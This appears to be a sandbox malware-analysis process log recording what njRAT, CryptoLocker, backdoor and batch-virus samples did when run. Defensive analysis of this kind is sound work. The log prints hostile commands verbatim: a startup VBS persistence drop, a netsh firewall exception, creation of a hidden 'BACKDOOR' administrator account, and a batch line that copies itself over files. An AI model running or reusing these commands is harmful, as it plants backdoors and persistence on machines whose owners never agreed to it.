C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2008,5121404395520247639,2563978353101033770,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9604 /prefetch:12⤵PID:8112
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2008,5121404395520247639,2563978353101033770,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=45 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9696 /prefetch:12⤵PID:7532
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2008,5121404395520247639,2563978353101033770,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=46 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9592 /prefetch:12⤵PID:8096
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2008,5121404395520247639,2563978353101033770,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=47 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9780 /prefetch:12⤵PID:7416
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2008,5121404395520247639,2563978353101033770,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=48 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9840 /prefetch:12⤵PID:6716
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2008,5121404395520247639,2563978353101033770,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=49 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9812 /prefetch:12⤵PID:1160
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2008,5121404395520247639,2563978353101033770,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=50 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10232 /prefetch:12⤵PID:8276
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2008,5121404395520247639,2563978353101033770,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=51 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10164 /prefetch:12⤵PID:8908
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2008,5121404395520247639,2563978353101033770,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=52 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10504 /prefetch:12⤵PID:9000
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2008,5121404395520247639,2563978353101033770,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=53 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8712 /prefetch:12⤵PID:6024
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2008,5121404395520247639,2563978353101033770,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=54 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8724 /prefetch:12⤵PID:6988
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:1588
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:2104
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:2520
-
C:\Users\Admin\Downloads\malware-master\malware-master\NJRAT\njRAT 0.7d\NjRAT 0.7d.exe"C:\Users\Admin\Downloads\malware-master\malware-master\NJRAT\njRAT 0.7d\NjRAT 0.7d.exe"1⤵
- Adds Run key to start application
- System Location Discovery: System Language Discovery
PID:2800 -
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\M.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\M.exe2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:3944 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c echo on error resume next:CreateObject("WScript.Shell").Run "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\M.exe",1: >"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x.vbs"3⤵
- Drops startup file
- System Location Discovery: System Language Discovery
PID:3872
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\M.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\M.exe3⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3728 -
C:\Users\Admin\AppData\Roaming\server.exe"C:\Users\Admin\AppData\Roaming\server.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:1436 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c echo on error resume next:CreateObject("WScript.Shell").Run "C:\Users\Admin\AppData\Roaming\server.exe",1: >"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x.vbs"5⤵
- Drops startup file
- System Location Discovery: System Language Discovery
PID:4172
-
-
C:\Users\Admin\AppData\Roaming\server.exeC:\Users\Admin\AppData\Roaming\server.exe5⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
PID:4888 -
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\server.exe" "server.exe" ENABLE6⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:4716
-
-
-
-
-
-
C:\Users\Admin\Downloads\malware-master\malware-master\DarkHorse VM\DarkHorseTrojanVirusMaker.exe"C:\Users\Admin\Downloads\malware-master\malware-master\DarkHorse VM\DarkHorseTrojanVirusMaker.exe"1⤵
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:5108
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k UnistackSvcGroup1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1484
-
C:\Users\Admin\Downloads\malware-master\malware-master\CryptoLocker 2014\1002.exe"C:\Users\Admin\Downloads\malware-master\malware-master\CryptoLocker 2014\1002.exe"1⤵
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
PID:964 -
C:\Users\Admin\AppData\Roaming\A4C3D1C6E1.exe"C:\Users\Admin\AppData\Roaming\A4C3D1C6E1.exe"2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
PID:1528
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill" /F /IM 1002.exe2⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4344
-
-
C:\Users\Admin\Downloads\malware-master\malware-master\CryptoLocker 2014\1003.exe"C:\Users\Admin\Downloads\malware-master\malware-master\CryptoLocker 2014\1003.exe"1⤵
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
PID:4596
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- Drops startup file
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SendNotifyMessage
PID:516
-
C:\Users\Admin\Downloads\malware-master\malware-master\Backdoor\Backdoor.exe"C:\Users\Admin\Downloads\malware-master\malware-master\Backdoor\Backdoor.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:4736 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\E1F0.tmp\E1F1.bat C:\Users\Admin\Downloads\malware-master\malware-master\Backdoor\Backdoor.exe"2⤵PID:3084
-
C:\Windows\system32\net.exenet user BACKDOOR /ADD3⤵PID:4936
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user BACKDOOR /ADD4⤵PID:1420
-
-
-
C:\Windows\system32\net.exenet localgroup administrators BACKDOOR /add3⤵PID:4988
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup administrators BACKDOOR /add4⤵PID:2184
-
-
-
C:\Windows\system32\net.exenet user BACKDOOR /active:no3⤵PID:1664
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user BACKDOOR /active:no4⤵PID:4704
-
-
-
-
C:\Users\Admin\Downloads\malware-master\malware-master\Backdoor\Backdoor(np).exe"C:\Users\Admin\Downloads\malware-master\malware-master\Backdoor\Backdoor(np).exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:748 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\EE25.tmp\EE26.bat C:\Users\Admin\Downloads\malware-master\malware-master\Backdoor\Backdoor(np).exe"2⤵PID:3516
-
C:\Windows\system32\net.exenet user BACKDOOR/ADD3⤵PID:3436
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user BACKDOOR/ADD4⤵PID:4484
-
-
-
C:\Windows\system32\net.exenet localgroup administrators BACKDOOR /add3⤵PID:4048
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup administrators BACKDOOR /add4⤵PID:3592
-
-
-
C:\Windows\system32\net.exenet user BACKDOOR /active:no3⤵PID:4384
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user BACKDOOR /active:no4⤵PID:4032
-
-
-
-
C:\Users\Admin\Downloads\malware-master\malware-master\Backdoor\Backdoor(na).exe"C:\Users\Admin\Downloads\malware-master\malware-master\Backdoor\Backdoor(na).exe"1⤵
- System Location Discovery: System Language Discovery
PID:1568 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\F1DE.tmp\F1DF.bat C:\Users\Admin\Downloads\malware-master\malware-master\Backdoor\Backdoor(na).exe"2⤵PID:4496
-
C:\Windows\system32\net.exenet user BACKDOOR /ADD3⤵PID:1360
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user BACKDOOR /ADD4⤵PID:2852
-
-
-
C:\Windows\system32\net.exenet localgroup administrators BACKDOOR /add3⤵PID:2776
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup administrators BACKDOOR /add4⤵PID:3380
-
-
-
C:\Windows\system32\net.exenet user BACKDOOR /active:no3⤵PID:2752
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user BACKDOOR /active:no4⤵PID:4504
-
-
-
-
C:\Users\Admin\Downloads\malware-master\malware-master\Backdoor\Backdoor(na)(np).exe"C:\Users\Admin\Downloads\malware-master\malware-master\Backdoor\Backdoor(na)(np).exe"1⤵
- System Location Discovery: System Language Discovery
PID:228 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\F4EC.tmp\F4FC.bat C:\Users\Admin\Downloads\malware-master\malware-master\Backdoor\Backdoor(na)(np).exe"2⤵PID:4124
-
C:\Windows\system32\net.exenet user BACKDOOR/ADD3⤵PID:2248
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user BACKDOOR/ADD4⤵PID:4944
-
-
-
C:\Windows\system32\net.exenet localgroup administrators BACKDOOR /add3⤵PID:3396
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup administrators BACKDOOR /add4⤵PID:1228
-
-
-
C:\Windows\system32\net.exenet user BACKDOOR /active:no3⤵PID:3692
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user BACKDOOR /active:no4⤵PID:1656
-
-
-
-
C:\Users\Admin\Downloads\malware-master\malware-master\DELmE\DELmE_s Batch Virus Generator v 2.0.exe"C:\Users\Admin\Downloads\malware-master\malware-master\DELmE\DELmE_s Batch Virus Generator v 2.0.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:1872
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\malware-master\malware-master\Killsight\wordmacromalware.Killsight.txt1⤵PID:2104
-
C:\Users\Admin\Downloads\malware-master\malware-master\666\666.exe"C:\Users\Admin\Downloads\malware-master\malware-master\666\666.exe"1⤵
- Enumerates connected drives
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:1800 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c @echo off2⤵
- System Location Discovery: System Language Discovery
PID:4916
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c dir c2⤵
- System Location Discovery: System Language Discovery
PID:3324
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c md VIRUS2⤵
- System Location Discovery: System Language Discovery
PID:5104
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/watch?v=t455k17_QAI2⤵PID:1768
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff84c2846f8,0x7ff84c284708,0x7ff84c2847183⤵PID:1364
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/watch?v=t455k17_QAI2⤵PID:5096
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x124,0x128,0x12c,0x100,0x130,0x7ff84c2846f8,0x7ff84c284708,0x7ff84c2847183⤵PID:4376
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/watch?v=t455k17_QAI2⤵PID:2268
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff84c2846f8,0x7ff84c284708,0x7ff84c2847183⤵PID:4564
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 11922⤵
- Program crash
PID:5552
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:1880
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x2f0 0x3041⤵PID:5244
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1800 -ip 18001⤵PID:5536
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\nigga.bat" "1⤵PID:1436
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y "2⤵PID:6480
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=1,* delims=: " %j in (InfList_exe.txt) do copy /y "C:\Users\Admin\Downloads\nigga.bat" "%j:%k""2⤵PID:6472
-
-
C:\Users\Admin\Downloads\malware-master\malware-master\MasterSlave (test)\MasterSlave.exe"C:\Users\Admin\Downloads\malware-master\malware-master\MasterSlave (test)\MasterSlave.exe"1⤵
- System Location Discovery: System Language Discovery
PID:2796 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c @echo off2⤵
- System Location Discovery: System Language Discovery
PID:3692
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c dir c2⤵
- System Location Discovery: System Language Discovery
PID:2856
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c md VIRUS2⤵
- System Location Discovery: System Language Discovery
PID:5672
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/watch?v=kSS_tDfeLOk2⤵PID:5784
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff84c2846f8,0x7ff84c284708,0x7ff84c2847183⤵PID:5816
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c MasterSlave.exe2⤵
- System Location Discovery: System Language Discovery
PID:5812 -
C:\Users\Admin\Downloads\malware-master\malware-master\MasterSlave (test)\MasterSlave.exeMasterSlave.exe3⤵
- Enumerates connected drives
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:5836 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c @echo off4⤵
- System Location Discovery: System Language Discovery
PID:2012
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c dir c4⤵
- System Location Discovery: System Language Discovery
PID:5900
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c md VIRUS4⤵
- System Location Discovery: System Language Discovery
PID:5936
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/watch?v=kSS_tDfeLOk4⤵PID:448
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff84c2846f8,0x7ff84c284708,0x7ff84c2847185⤵PID:4956
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c MasterSlave.exe4⤵
- System Location Discovery: System Language Discovery
PID:5632 -
C:\Users\Admin\Downloads\malware-master\malware-master\MasterSlave (test)\MasterSlave.exeMasterSlave.exe5⤵
- System Location Discovery: System Language Discovery
PID:5692 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c @echo off6⤵
- System Location Discovery: System Language Discovery
PID:5808
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c dir c6⤵
- System Location Discovery: System Language Discovery
PID:5904
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c md VIRUS6⤵
- System Location Discovery: System Language Discovery
PID:4948
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/watch?v=kSS_tDfeLOk6⤵PID:5928
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff84c2846f8,0x7ff84c284708,0x7ff84c2847187⤵PID:6072
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c MasterSlave.exe6⤵PID:1400
-
C:\Users\Admin\Downloads\malware-master\malware-master\MasterSlave (test)\MasterSlave.exeMasterSlave.exe7⤵PID:5720
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c @echo off8⤵PID:3904
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c dir c8⤵PID:1504
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c md VIRUS8⤵PID:3780
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/watch?v=kSS_tDfeLOk8⤵PID:404
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff84c2846f8,0x7ff84c284708,0x7ff84c2847189⤵PID:5652
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://thoughtcatalog.com/juliet-escoria/2013/12/16-steps-to-kill-someone-and-not-get-caught/8⤵PID:5504
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x120,0x124,0x128,0x11c,0xf8,0x7ff84c2846f8,0x7ff84c284708,0x7ff84c2847189⤵PID:2776
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.topgunsupply.com/sig-sauer-p226r-9mm-nitron-siglite-night-sights-da-sa.html8⤵PID:6476
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x120,0x124,0x128,0xf8,0x12c,0x7ff84c2846f8,0x7ff84c284708,0x7ff84c2847189⤵PID:6532
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.amazon.com/Disaster-Bag-Body/dp/B0012C9UGK8⤵PID:4228
-
